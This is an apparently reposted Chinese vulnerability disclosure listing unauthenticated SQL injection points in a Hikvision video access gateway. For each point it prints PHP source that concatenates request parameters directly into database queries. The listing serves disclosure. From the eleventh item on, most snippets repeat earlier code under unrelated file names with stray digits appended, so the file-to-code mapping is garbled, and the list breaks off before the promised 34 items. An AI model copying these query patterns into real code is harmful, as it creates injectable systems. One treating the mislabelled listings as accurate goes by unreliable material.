神刀安全网

漏洞标题: 海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

漏洞详情

披露状态:

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

rt

详细说明:

第一处注入:/userInfo/userInfo.php

code 区域
<?php
include('../common/connDb.php');
include('roleInfoClass.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['userId']);
$userId = "";
$name = "";
$password = "******";
$realName = "";
$phone = "";
$eMail = "";
$roleId = "";
$unitCode = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from user_info where userId ='.$_GET['userId']);
while ($row = $dbQuery->fetchArray($re)){
$userId = $row['userId'];
$name = $row['name'];
//$password = $row['password'];
$realName = $row['realName'];
$phone = $row['phone'];
$eMail = $row['eMail'];
$roleId = $row['roleId'];
$unitCode= $row['unitCode'];

第二处注入:/userInfo/roleInfo.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

第三处注入:/data/fetchRoleTreeJson.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

第四处注入:/deviceConfig/configDeviceInfo.php

code 区域
<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}

$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}

$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);

第五处注入:/transformServer/serverConfigInfo.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['transId']);
$transId = "";
$name = "";
$transIp = "";
$transPort = "";
$transMax = "";
$transType = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from transform_server_info where transform_server_id ='.$_GET['transId']);

第六处注入:/cameraConfig/transferInfo.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$id = $_GET['id'];
$src_audio_encode = "-1";
$src_video_encode = "-1";
$src_standard = "0";
$src_stream_type = "0";
$src_transform = "-1";
$src_image_size = "1";
$dst_audio_encode = "2";
$dst_video_encode = "1";
$dst_stream_type = "0";
$dst_transform = "2";
$dst_bitrate_type = "1";
$dst_resolution = "3";
$dst_video_bitrate = "19";
$dst_framerate = "-1";
$dst_interval_BPframe = "2";
$dst_interval_Iframe = "30";
$dst_pic_quality = "0";
$transform_server_id = "";

$re = $dbQuery->query('select * from camera_info where is_transform=1 and id ='.$id);
while ($row = $dbQuery->fetchArray($re)){

第七处注入:/data/deviceAndCameraListData.php

code 区域
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
$name=@$_POST['name'];
$organize=@$_POST['organize'];
$group=@$_POST['group'];
$configFlag=@$_POST['configFlag'];
$type=@$_GET['type'];
$deviceIndexCode = @$_GET['deviceIndexCode'];
$deviceId = @$_GET['deviceId'];
$show = @$_GET['show'];
if($type =="device"){
$whereStr="";
if($name != ""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
}
if($organize != ""){
if($organize =="0"){ //如果是主控制中心则查询全部
}else{
if(strlen($organize)==8){//如果是派出所级别
$whereStr =" and d.indexcode like '".$organize."%'";
}else{
$qxCode = substr($organize,4,2);
$shiCode = substr($organize,2,2);
$shengCode = substr($organize,0,2);
if($shiCode=="00" && $qxCode=="00"){ //如果是省
$whereStr =" and d.indexcode like '".$shengCode."%'";
}else if($shiCode !="00" && $qxCode=="00"){ //如果是市
$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
}else{
$whereStr =" and d.indexcode like '".$organize."%'";
}
}

}
}

if($group != ""){
if($group=="-1"){
}else{
$whereStr =" and d.group_id =".$group;
}
}

$str="";
if($configFlag == "1"){
$str =" and (c.is_transform is null or c.is_transform=0)";
}else if($configFlag == "2"){
$str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
}
$re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
$jsonArray = array();


$count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
while ($row = $dbQuery->fetchArray($re)){
$pNode = new TreeNode();

第8处注入:/data/deviceTypeData.php

code 区域
<?php 
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from device_type_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from device_type_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>

第九处注入:/data/checkIsExist.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$object=$_POST['object'];
if($object=="userInfo"){ //如果是校验用户名称
$name=$_POST['name'];
$userId=$_POST['userId'];
checkUserName($dbQuery,$name,$userId);
}else if($object=="roleInfo"){
$name=$_POST['name'];
$roleId=$_POST['roleId'];
checkRoleName($dbQuery,$name,$roleId);
}else if($object=="password"){
$name=$_POST['name'];
$password=$_POST['password'];
checkPassword($dbQuery,$name,$password);
}else if($object=="deviceGroup"){ //如果是校验用户名称
$name=$_POST['name'];
$groupId=$_POST['groupId'];
checkGroupName($dbQuery,$name,$groupId);
}

function checkUserName($dbQuery,$name,$userId){
$count = 0;
if($userId ==""){
$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'" and userId<>'.$userId);
}
echo $count;
$dbQuery->closeDb();
}

function checkRoleName($dbQuery,$name,$roleId){
$count = 0;
if($roleId ==""){
$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'" and roleId<>'.$roleId);
}
echo $count;
$dbQuery->closeDb();
}

function checkPassword($dbQuery,$name,$password){
$oldPassword = $dbQuery->querySingle('select password from user_info where name="'.$name.'"');
if($password ==$oldPassword){
echo 0;
}else{
echo 1;
}
$dbQuery->closeDb();
}

function checkGroupName($dbQuery,$name,$groupId){
$count = 0;
if($groupId ==""){
$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'" and id<>'.$groupId);
}
echo $count;
$dbQuery->closeDb();
}
?>

第十处注入:/data/fetchIoInfoData.php

code 区域
<?php
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
$organize=@$_POST['organize'];
$group=@$_POST['group'];
$configFlag=@$_POST['configFlag'];

$re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,d.indexcode devIndexCode,d.type_code typeCode, c.globe_num from io_info c,device_info d where c.device_indexcode=d.indexcode order by c.id '.$order.' limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from io_info c,device_info d where c.device_indexcode=d.indexcode');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>

第十一处:/data/saveDeviceType.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

0

第十二处:/data/saveDecodeServer.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

1

第十三处:/data/fetchGroup.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

2

第十四处:/data/login.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

3

第十五处:/data/transferCamera.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

4

第十六处:/data/modifyPassword.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

5

第十七处:/data/fetchDeviceByGroupId.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

6

第十八处:/data/deleteDeviceInfo.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

7

第十九处:/data/modifyDeviceInfo.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

8

第二十处:/data/decodeServerData.php

code 区域
<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}

9

第二十一处:/data/userInfoData.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

0

第二十二处:/data/checkDevice.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

1

第二十三处:/data/deviceListData.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

2

第二十四处:/data/saveUserInfo.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

3

第二十五处:/data/fetchCameraInfo.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

4

第二十六处:/data/fetchDeviceType.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单

5

第二十七处:/data/saveGroup.php

code 区域
<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}

class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}

/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}

/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
